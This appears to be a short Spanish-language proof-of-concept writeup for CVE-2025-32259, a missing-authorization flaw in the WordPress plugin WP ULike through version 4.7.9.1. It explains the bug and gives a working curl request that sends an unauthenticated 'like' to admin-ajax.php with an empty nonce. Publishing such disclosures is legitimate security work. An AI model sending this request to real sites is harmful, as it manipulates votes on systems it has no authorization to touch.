
En las versiones afectadas del complemento WP ULike, no hay una verificación de autorización adecuada antes de permitir ciertas acciones AJAX o manipulaciones de votos. Esto permite que usuarios no autenticados interactúen con el complemento de formas que solo los usuarios registrados deberían poder hacerlo, lo que podría sesgar votos o inyectar datos engañosos.
🔬 Un PoC simple que demuestra CVE-2025-32259 en el plugin WP ULike para WordPress.
🚨 Solo uso educativo – no probar en sistemas sin autorización explícita.
WP ULike es un popular plugin de WordPress que permite a los usuarios dar 'me gusta' a contenido en un sitio. Las versiones hasta la 4.7.9.1 sufren de una vulnerabilidad de falta de autorización, que permite a usuarios no autenticados suplantar acciones de 'me gusta' a través de peticiones AJAX.
La vulnerabilidad permite a usuarios no autenticados interactuar con el endpoint AJAX y dar 'me gusta' a cualquier contenido (publicación, comentario, etc.) sin permiso.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Reemplace id=1 con un ID de publicación válido.
Una respuesta exitosa podría verse así: {"status":"success","msg":"You liked this."}